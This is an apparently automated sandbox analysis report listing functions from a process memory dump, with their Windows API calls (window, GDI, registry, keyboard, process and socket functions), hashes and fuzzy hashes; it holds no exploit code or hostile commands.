Opcode ID: 4eb946ceeecdba088355ce592fb8c14f79cb4c149d54faef2f2d4a1465d2c0e0
Instruction ID: c12d8b9c07f2a5c230c568dfb5e2f758c7b4ae823634c865792ad89d3a4e706b
Opcode Fuzzy Hash: 4eb946ceeecdba088355ce592fb8c14f79cb4c149d54faef2f2d4a1465d2c0e0
Instruction Fuzzy Hash: 86A17072604301ABD310EF65CC41FAEB7E9BFC9700F448959F6859B281DBB9E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FF045D, Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00FF049C
MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000), ref: 00FF06D8
SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00FF06F7
InvalidateRect.USER32(?,00000000,00000001), ref: 00FF071A
SendMessageW.USER32(?,00000469,?,00000000), ref: 00FF074F
ShowWindow.USER32(?,00000000), ref: 00FF0772
DefDlgProcW.USER32(?,00000005,?,?), ref: 00FF078C

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
String ID:
API String ID: 1457242333-0
Opcode ID: af4d38d467a24f9d1115e132136eb78e9f2ecbcd36d5edc9cade806d57f79729
Instruction ID: 9d25a902d13590ba021acf6c1542692e7f95d86378e36879629ffae35c1e6469
Opcode Fuzzy Hash: af4d38d467a24f9d1115e132136eb78e9f2ecbcd36d5edc9cade806d57f79729
Instruction Fuzzy Hash: D6B1AE31A00209EFCB14CF68C9847BEBBF1FF88311F148559EA95D7295DB74AA50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FF7273, Relevance: 10.7, APIs: 7, Instructions: 210COMMON

Download Yara Rule

APIs

Part of subcall function 00FF70BF: DeleteObject.GDI32(00000000), ref: 00FF70FC
Part of subcall function 00FF70BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00FF713C
Part of subcall function 00FF70BF: SelectObject.GDI32(?,00000000), ref: 00FF714C
Part of subcall function 00FF70BF: BeginPath.GDI32(?), ref: 00FF7161
Part of subcall function 00FF70BF: SelectObject.GDI32(?,00000000), ref: 00FF718A

Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 00FF73E8
MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 00FF73F8
AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 00FF7433
LineTo.GDI32(?,?,FFFFFFFE), ref: 00FF743C
CloseFigure.GDI32(?), ref: 00FF7443
SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 00FF7452
Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 00FF746E

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
String ID:
API String ID: 4082120231-0
Opcode ID: e97417cc0a55229d7cfc3e3cd0c26cd59b9b67669d6f51657a00d7b89b01713b
Instruction ID: 5f04b6d0aaabd98e33814ae8a6065e14aa720f2929291586c15806b9c1322376
Opcode Fuzzy Hash: e97417cc0a55229d7cfc3e3cd0c26cd59b9b67669d6f51657a00d7b89b01713b
Instruction Fuzzy Hash: 81713AB5904209EFDB04DF98C884EBEBBB9EF89310F248149F955A7351C734AE41DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0101A3F6, Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

Part of subcall function 00FB1D10: _wcslen.LIBCMT ref: 00FB1D11
Part of subcall function 00FB1D10: _memmove.LIBCMT ref: 00FB1D57

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101A51C
RegOpenKeyExW.ADVAPI32 ref: 0101A548
RegCloseKey.ADVAPI32(?), ref: 0101A573
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0101A5A6
RegCloseKey.ADVAPI32(?), ref: 0101A5CF
RegCloseKey.ADVAPI32(?), ref: 0101A608
RegCloseKey.ADVAPI32(?), ref: 0101A613

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
String ID:
API String ID: 2027346449-0
Opcode ID: 2d483604835042ec3e81c49c045e837c9895a35262e99b3931cc7b63b3bfbfb1
Instruction ID: 72a9d949daea3d21f20183e19a79179ca8988767070cbb4c125c86c88bba0709
Opcode Fuzzy Hash: 2d483604835042ec3e81c49c045e837c9895a35262e99b3931cc7b63b3bfbfb1
Instruction Fuzzy Hash: 90612A71218341AFD704EF65C881EABB7E9BFC8714F04891DF68587286DB39E904CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00FF42E1, Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00FF4320
GetKeyboardState.USER32(?), ref: 00FF4335
SetKeyboardState.USER32(?), ref: 00FF4389
PostMessageW.USER32 ref: 00FF43B9
PostMessageW.USER32 ref: 00FF43DA
PostMessageW.USER32 ref: 00FF4426
PostMessageW.USER32 ref: 00FF444B

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9700cdf481eba25431c015575323e8f097ed818398d9e3628e6e37770200c859
Instruction ID: 19512b2fa4a59119ab9c79312dbd766c2528a8466f5d978c498fde825568c18d
Opcode Fuzzy Hash: 9700cdf481eba25431c015575323e8f097ed818398d9e3628e6e37770200c859
Instruction Fuzzy Hash: 355107A09047D939F732C2788C45BB7BFA95F06310F088689F6D5654D3D3A8B994E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0101C3A9, Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0101C54C
WSAGetLastError.WSOCK32(00000000), ref: 0101C55D

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastselect
String ID:
API String ID: 215497628-0
Opcode ID: 8a6036e2fb8f4dbb0300c9bb4342e5daa1d4c9f80e31cf5abf8b9a4570a0165c
Instruction ID: 7d413f60298eef489d809ddd4f4b513866bc4ec740a15e387338baef57b86710
Opcode Fuzzy Hash: 8a6036e2fb8f4dbb0300c9bb4342e5daa1d4c9f80e31cf5abf8b9a4570a0165c
Instruction Fuzzy Hash: 5151FB72A40104ABD710EBA8DD81FEF77A8FF85310F148159F945D7281DB39E904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FF44D9, Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00FF4518
GetKeyboardState.USER32(?), ref: 00FF452D
SetKeyboardState.USER32(?), ref: 00FF4581
PostMessageW.USER32 ref: 00FF45AE
PostMessageW.USER32 ref: 00FF45CC
PostMessageW.USER32 ref: 00FF4615
PostMessageW.USER32 ref: 00FF4637

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 2c0e47a10bf09205afeaef406488864b8aeef5931281deabffd77af4a9c581e7
Instruction ID: c58483ca4e3df03eb310f6ff9de74167fbfa243a4a59a47d0633b035333b108e
Opcode Fuzzy Hash: 2c0e47a10bf09205afeaef406488864b8aeef5931281deabffd77af4a9c581e7
Instruction Fuzzy Hash: 4F5127A09087D939F73693288C45BB7FF996F06710F0C8689F2D5554D2C3A8BC84E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 010052F4, Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001308,?,00000000), ref: 01005314
ImageList_Remove.COMCTL32(?,?), ref: 01005348
SendMessageW.USER32(?,0000133D,?,00000002), ref: 01005430
DeleteObject.GDI32(?), ref: 010056AB
DeleteObject.GDI32(?), ref: 010056B9
DestroyIcon.USER32(?), ref: 010056C7
DestroyWindow.USER32 ref: 010056D5

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
String ID:
API String ID: 2354583917-0
Opcode ID: 3ee2ef3d933725c6096c88c04279b55b5de162a1716aacf27d2139a5713bbdb9
Instruction ID: d4c8ede0fc735c7f761f869c6598f1de9a96f937fc728943ec572bcd118755ce
Opcode Fuzzy Hash: 3ee2ef3d933725c6096c88c04279b55b5de162a1716aacf27d2139a5713bbdb9
Instruction Fuzzy Hash: AD51BE342046419FE726CF28C894BA6BBE5FF89301F448698FAD5CB391DB34A941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0102557E, Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 010255C2
Process32FirstW.KERNEL32(00000000,0000022C), ref: 010255D2
__wsplitpath.LIBCMT ref: 010255FE

Part of subcall function 00FC392E: __wsplitpath_helper.LIBCMT ref: 00FC3970

_wcscat.LIBCMT ref: 01025611
__wcsicoll.LIBCMT ref: 01025635
Process32NextW.KERNEL32(00000000,?), ref: 01025665
CloseHandle.KERNEL32(00000000), ref: 01025674

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 2547909840-0
Opcode ID: 437f18a5c497f4fd50795d317caa3cf428c1c1a2a558b27b141788c4a2d70d4d
Instruction ID: ac72e2858745e82efe5b5d28b063ace478e94c6d07aaea00867c2f6dcf784820
Opcode Fuzzy Hash: 437f18a5c497f4fd50795d317caa3cf428c1c1a2a558b27b141788c4a2d70d4d
Instruction Fuzzy Hash: B0517571900219ABDB11DF94CD86FDD77B8AF44304F108094FA09AB282DB75AE44DF65

Uniqueness

Uniqueness Score: -1.00%

Function 010054A6, Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON

Download Yara Rule

APIs

ImageList_Destroy.COMCTL32(?), ref: 010054AE
ImageList_Destroy.COMCTL32(?), ref: 010054BC
DestroyWindow.USER32 ref: 0100569D
DeleteObject.GDI32(?), ref: 010056AB
DeleteObject.GDI32(?), ref: 010056B9
DestroyIcon.USER32(?), ref: 010056C7
DestroyWindow.USER32 ref: 010056D5

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$DeleteImageList_ObjectWindow$Icon
String ID:
API String ID: 3985565216-0
Opcode ID: dabb5fa96e0979922def3c2c634749dd6e23b2907a9acf8af00be09e9070d440
Instruction ID: 75c505255a01c20a4d8ef5a4e3adc688fb4b35f0e70ff9e4f93ed38290ffd7e0
Opcode Fuzzy Hash: dabb5fa96e0979922def3c2c634749dd6e23b2907a9acf8af00be09e9070d440
Instruction Fuzzy Hash: F0212E743046019FE762DF28DDD4A1A7BEABF48311F108598E985CB2C5CB36E841CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00FE01F8, Relevance: 9.3, APIs: 6, Instructions: 255COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00FE0253
GetWindowRect.USER32 ref: 00FE0283
GetClientRect.USER32 ref: 00FE02D1
GetSystemMetrics.USER32 ref: 00FE031E
GetWindowRect.USER32 ref: 00FE0330
ScreenToClient.USER32(?,?), ref: 00FE0359

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Client$Window$MetricsScreenSystem
String ID:
API String ID: 3220332590-0
Opcode ID: eb8fb8722bfb75fc832cc0cc5aae4b21464b7a81354bb327090f187635f59352
Instruction ID: de2b384eca02d951d2985ac529930f27f4bbd39747b23fcbc8b731500d11aa2b
Opcode Fuzzy Hash: eb8fb8722bfb75fc832cc0cc5aae4b21464b7a81354bb327090f187635f59352
Instruction Fuzzy Hash: C0A16B75A0074ADBCB20CFB9C5847EEB7B1FF58324F048519E9A9D3250EB71A984EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FFF149, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FFCF87
_strncmp.LIBCMT ref: 00FFF9B9

Strings

\, xrefs: 00FFCFD7
U, xrefs: 00FFFAFE
>, xrefs: 00FFF04E

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove_strncmp
String ID: >$U$\
API String ID: 2666721431-237099441
Opcode ID: 03fd6f44349e9715b2db13f58e2abe2e0300c67ee13ec228ecb03842bd9ec301
Instruction ID: 47e378d747e240e31ac4e024bbdd73efeeb512c0fe1c3329f70004c834f69f68
Opcode Fuzzy Hash: 03fd6f44349e9715b2db13f58e2abe2e0300c67ee13ec228ecb03842bd9ec301
Instruction Fuzzy Hash: E0F18E70A0024D8FDB24CF69C8906BEBBF2FF89310F2481AED95697391D774A945DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FFC48A, Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00FFC4E6
SetKeyboardState.USER32(00000080), ref: 00FFC50A
PostMessageW.USER32 ref: 00FFC54B
PostMessageW.USER32 ref: 00FFC583
PostMessageW.USER32 ref: 00FFC5A5
SendInput.USER32(00000001,?,0000001C), ref: 00FFC638

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePost$KeyboardState$InputSend
String ID:
API String ID: 2221674350-0
Opcode ID: 53bc3635aee33df6a240da1d509a2e72d26f4ed3675a9b45e4704ae17afefe0f
Instruction ID: 2237658496c268054cac7d76226124921436369051b1e5c99df8a95367cd4974
Opcode Fuzzy Hash: 53bc3635aee33df6a240da1d509a2e72d26f4ed3675a9b45e4704ae17afefe0f
Instruction Fuzzy Hash: AD517F7290016C66DF10DFA5DC80BFE7B69AF89320F08419AFEC496142C339E945E7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0100558B, Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0100560A
DestroyWindow.USER32 ref: 0100569D
DeleteObject.GDI32(?), ref: 010056AB
DeleteObject.GDI32(?), ref: 010056B9
DestroyIcon.USER32(?), ref: 010056C7
DestroyWindow.USER32 ref: 010056D5

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: DestroyWindow$DeleteObject$IconMove
String ID:
API String ID: 1640429340-0
Opcode ID: 82cd70423c16abb65c8d3d2b40ce61b55073e8821ad08f1c0cb63f06a9795110
Instruction ID: ce2bb9fe8b015fea63eed91eb2039f21a78c49d070532002fb9794f3b8b101a8
Opcode Fuzzy Hash: 82cd70423c16abb65c8d3d2b40ce61b55073e8821ad08f1c0cb63f06a9795110
Instruction Fuzzy Hash: B13118702006019FEB26DF18DCD8A2677F9FF48311F0485A9E585CB295D735E881CF61

Uniqueness

Uniqueness Score: -1.00%

Function 010050DD, Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON

Download Yara Rule

APIs

DestroyMenu.USER32 ref: 01005149
DestroyMenu.USER32 ref: 0100515F
DeleteObject.GDI32(?), ref: 010056AB
DeleteObject.GDI32(?), ref: 010056B9
DestroyIcon.USER32(?), ref: 010056C7
DestroyWindow.USER32 ref: 010056D5

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$DeleteMenuObject$IconWindow
String ID:
API String ID: 752480666-0
Opcode ID: 302cf1995831a81583906762c82802563595523566f265a9918bbaa7e018bdb6
Instruction ID: c04360d577f77dded667fb328feb3faa8807954cc912f8fcf94d0f6bee7efe8b
Opcode Fuzzy Hash: 302cf1995831a81583906762c82802563595523566f265a9918bbaa7e018bdb6
Instruction Fuzzy Hash: D3212E74204601DFE726DF28EDD8B6A77EABF44310F048598EAC68B295C735D885CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0100526F, Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 010052D7
ImageList_Destroy.COMCTL32(?), ref: 010052E9
DeleteObject.GDI32(?), ref: 010056AB
DeleteObject.GDI32(?), ref: 010056B9
DestroyIcon.USER32(?), ref: 010056C7
DestroyWindow.USER32 ref: 010056D5

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$DeleteObjectWindow$IconImageList_
String ID:
API String ID: 3275902921-0
Opcode ID: 5b516cd9a2dae3112ebf7c1894381b3d81969a5c45a26f9fed6fca4ebf34942e
Instruction ID: ffc7f63323d34446ea26dd3b397f15693cbf42defb5a40ee25c46e153c44589a
Opcode Fuzzy Hash: 5b516cd9a2dae3112ebf7c1894381b3d81969a5c45a26f9fed6fca4ebf34942e
Instruction Fuzzy Hash: CA216B706046019FE756DF78EC88A56BBE9FF49310F108668F999C7285CB35E841CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00FE3187, Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,01058178), ref: 00FE319E
QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,01058178), ref: 00FE31B9
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,01058178), ref: 00FE31C3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,01058178), ref: 00FE31CB
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,01058178), ref: 00FE31D5

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: d373ded18793bff86a8ac66691e14da1fcc4e8036525fdb5d28cfa24eb835ced
Instruction ID: 5447ba3cefcc28aa342c37f1bebdcb595bb597d31c29b7de8cbbbf1e523bb71a
Opcode Fuzzy Hash: d373ded18793bff86a8ac66691e14da1fcc4e8036525fdb5d28cfa24eb835ced
Instruction Fuzzy Hash: 7811D336D0011DABCF109F99EA089EDB778FF89722F114556EA44A3204DB359A059BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0100551D, Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 0100553C
SendMessageW.USER32(?,00001008,00000000,00000000), ref: 01005557
DeleteObject.GDI32(?), ref: 010056AB
DeleteObject.GDI32(?), ref: 010056B9
DestroyIcon.USER32(?), ref: 010056C7
DestroyWindow.USER32 ref: 010056D5

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteDestroyMessageObjectSend$IconWindow
String ID:
